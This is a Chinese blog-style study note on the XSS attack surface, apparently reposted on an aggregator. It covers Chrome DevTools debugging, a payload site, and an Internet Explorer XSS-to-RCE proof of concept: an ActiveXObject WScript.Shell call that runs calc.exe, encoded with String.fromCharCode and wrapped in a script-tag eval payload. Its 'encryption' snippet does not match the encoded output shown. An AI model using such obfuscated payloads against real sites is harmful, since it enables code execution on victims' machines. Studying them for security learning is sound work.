2019-12-20

最近在网上看师傅们面试各大厂的面试经历和心得体会文章。然后被某问题吸引…

能想到XSS的最大攻击面是什么？

发现学的知识点都是 XSS 漏洞的挖掘和一些 Bypass。对于XSS的攻击面的研究并不深入。于是又看了很多网上的文章，下面对XSS的攻击面进行小结。

0x01 Chrome DevTools

首先很重要的是在 Chrome DevTools 中调试 JavaScript。

Chrome的调试技巧

在 Chrome DevTools 中调试 JavaScript 入门

0x02 XSS payloads

一个 XSS payloads的网站 —— xss-payloads

含有很多之前没学过的姿势，看了些代码，发现前端知识匮乏，慢慢研究吧～

0x03 ActiveXObject 从 XSS 到 RCE (IE)

首先更改 IE 浏览器安全配置

控制台运行

var o = new ActiveXObject("WScript.Shell");
o.run("calc.exe");

对 JS 进行加密

var str = "HELLO WORLD";
var n = str.charCodeAt(str.length-1);

加密后得

String.fromCharCode(10,118,97,114,32,111,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,39,87,83,99,114,105,112,116,46,115,104,101,108,108,39,41,59,10,111,46,114,117,110,40,39,99,97,108,99,46,101,120,101,39,41,59,10)

一个例子实战

<script>eval(String.fromCharCode(10,118,97,114,32,111,61,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,39,87,83,99,114,105,112,116,46,115,104,101,108,108,39,41,59,10,111,46,114,117,110,40,39,99,97,108,99,46,101,120,101,39,41,59,10));</script>

0x01 Chrome DevTools

0x02 XSS payloads

0x03 ActiveXObject 从 XSS 到 RCE (IE)

Recommend

AI骚扰电话成“毒瘤”，摘除还要靠AI技术

金山软件已递交有关分拆建议书金山云拟在美IPO

通往低抵押的DeFi之路

透视下一个10年中国经济新动能

外媒：京东物流推进海外IPO计划最高募资额或达100亿美元

最古老的森林遗迹

印度加快淘汰燃煤转向可更新能源

中国黑客组织被发现能绕过二步验证

老挝野生虎灭绝

彭博社因根据假新闻稿发新闻被罚款 500 万欧元

About Joyk